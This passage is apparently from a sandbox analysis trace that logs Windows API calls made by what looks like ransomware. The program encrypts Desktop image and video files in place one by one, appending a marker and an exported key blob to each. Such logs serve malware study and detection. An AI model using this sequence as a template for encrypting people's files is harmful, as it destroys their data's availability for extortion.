dwFileAttributes=0x80) returned 1 [0152.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OmMryh0P8Nm-A7w9r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ommryh0p8nm-a7w9r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.418] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=49291) returned 1 [0152.418] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=49291) returned 1 [0152.418] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xbf69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.418] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.418] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.418] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.418] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.419] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.419] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc08b, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xc08b, lpOverlapped=0x0) returned 1 [0152.419] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.419] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc08b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc090) returned 1 [0152.420] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.420] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc090, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xc090, lpOverlapped=0x0) returned 1 [0152.420] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.420] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.420] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.420] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.420] CloseHandle (hObject=0x188) returned 1 [0152.481] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.485] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.485] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.485] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.485] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.485] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q4qqHVWjm7SD6H.swf", dwFileAttributes=0x80) returned 1 [0152.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q4qqHVWjm7SD6H.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4qqhvwjm7sd6h.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.485] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=53749) returned 1 [0152.485] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=53749) returned 1 [0152.486] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xd0d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.486] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.486] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.486] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.486] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.486] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.486] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd1f5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xd1f5, lpOverlapped=0x0) returned 1 [0152.487] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.487] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd1f5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd200) returned 1 [0152.488] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.488] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd200, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xd200, lpOverlapped=0x0) returned 1 [0152.488] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.488] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.488] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.488] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.488] CloseHandle (hObject=0x188) returned 1 [0152.504] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.511] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.511] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.512] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r-zot.mp4", dwFileAttributes=0x80) returned 1 [0152.512] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r-zot.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\r-zot.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.512] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=69970) returned 1 [0152.512] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=69970) returned 1 [0152.512] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x11030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.512] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.513] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.513] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.513] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.513] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.513] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x11152, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x11152, lpOverlapped=0x0) returned 1 [0152.514] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.514] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x11152, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x11160) returned 1 [0152.515] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.515] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11160, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x11160, lpOverlapped=0x0) returned 1 [0152.515] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.515] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.515] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.515] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.515] CloseHandle (hObject=0x188) returned 1 [0152.532] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.537] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.537] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.538] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sIY-XfIg_7tw.jpg", dwFileAttributes=0x80) returned 1 [0152.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sIY-XfIg_7tw.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\siy-xfig_7tw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.538] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=101557) returned 1 [0152.539] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=101557) returned 1 [0152.539] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x18b93, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.539] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.539] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.539] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.539] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.539] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.539] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18cb5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x18cb5, lpOverlapped=0x0) returned 1 [0152.541] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.541] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x18cb5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x18cc0) returned 1 [0152.542] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.542] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18cc0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x18cc0, lpOverlapped=0x0) returned 1 [0152.542] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.542] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.542] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.543] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.543] CloseHandle (hObject=0x188) returned 1 [0152.578] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.583] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.583] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.583] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\suY2fPNHbBC-EO34.jpg", dwFileAttributes=0x80) returned 1 [0152.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\suY2fPNHbBC-EO34.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\suy2fpnhbbc-eo34.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.584] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=76546) returned 1 [0152.584] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=76546) returned 1 [0152.584] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x129e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.584] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.584] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.584] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.584] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.584] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.584] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12b02, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x12b02, lpOverlapped=0x0) returned 1 [0152.585] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.585] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b02, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x12b10) returned 1 [0152.586] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.586] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12b10, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x12b10, lpOverlapped=0x0) returned 1 [0152.586] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.587] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.587] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.587] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.587] CloseHandle (hObject=0x188) returned 1 [0152.612] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.617] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.617] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.617] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.617] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.617] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tE_qbDgg7uq7vaAFsj.png", dwFileAttributes=0x80) returned 1 [0152.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tE_qbDgg7uq7vaAFsj.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\te_qbdgg7uq7vaafsj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.617] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=90789) returned 1 [0152.618] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=90789) returned 1 [0152.618] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x16183, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.618] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.618] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.618] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.618] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.618] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.618] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x162a5, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x162a5, lpOverlapped=0x0) returned 1 [0152.620] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.620] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x162a5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x162b0) returned 1 [0152.621] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.621] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x162b0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x162b0, lpOverlapped=0x0) returned 1 [0152.621] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.621] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.621] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.622] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.622] CloseHandle (hObject=0x188) returned 1 [0152.641] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.653] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.653] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.654] FindNextFileW 